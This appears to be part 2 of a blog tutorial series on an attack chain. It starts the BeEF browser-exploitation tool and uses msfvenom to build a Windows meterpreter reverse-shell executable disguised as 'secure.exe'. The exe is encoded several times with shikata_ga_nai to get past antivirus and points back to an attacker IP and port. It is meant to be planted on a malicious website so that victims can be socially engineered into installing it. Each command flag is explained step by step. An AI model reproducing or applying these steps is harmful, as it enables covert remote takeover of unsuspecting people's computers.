In part one we created our Word document which will run the initial stage, and here in part 2 we will be creating the two malicious payloads which will be used in our malicious web page which we will make in part 3.
We will also be using msfvenom to create a malicious exe which we will make available on our malicious website and attempt to “socially engineer” the victim into downloading and installing it.
What you need;
- Kali linux (comes pre-installed with both Beef and msfvenom)
- Less than 5 minutes
Login to Kali and open two terminal windows.
First off let’s get Beef running, in kali we simply type “beef-xss” and you should see the following output once it has started. The first time you run this you should also be prompted to create a password. Obviously note this for logging in later.
Copy the script as highlighted above, you will need this for part 3.
The browser will also automatically open to provide access to Beef’s Gui which we will monitor for victims once our site is live. If it shows an error message “unable to connect”, wait a few minutes then refresh the browser window and you should see the login screen. Note this url (also shown in the screen shot above)
Login and have a look around, it’s a great tool and we will use it in other videos.
Now let’s move on to making our malicious exe.
In our next window we are going to paste a prepared cmd into the terminal shown below;
Let’s break this down to help you better understand what we are doing;
- msfvenom – this is what we are using to create our payload
- –platform windows – the payload is targeted to Windows operating systems
- –arch x86 – our exe will be 32-bit
- -p windows/meterpreter/reverse_tcp – the malicious payload will be a reverse meterpreter shell we can connect to using metasploit.
- -e x86/shikata_ga_nai – specifies the encoder we want to use for the payload
- -i 5 – specifies the number of iterations of encoding. (The better the encoding the more likely it will bypass anti-virus protections)
- -b ‘\x00’ – specifies to avoid bad characters while encoding, in this case we want to avoid null.
- LHOST=192.168.56.106 LPORT=4444 – this is the IP and port of the machine we wish to connect back to from the victim. (Our attacking machine).
- -f exe– this is the file type we wish to create
- > secure.exe – and finally the file name we are creating.
If it is successfully created we should see the below message.
Save this file somewhere ready to upload to our server.
That’s it, we have our 2 payloads ready to use in our malicious website. See you soon for part 3.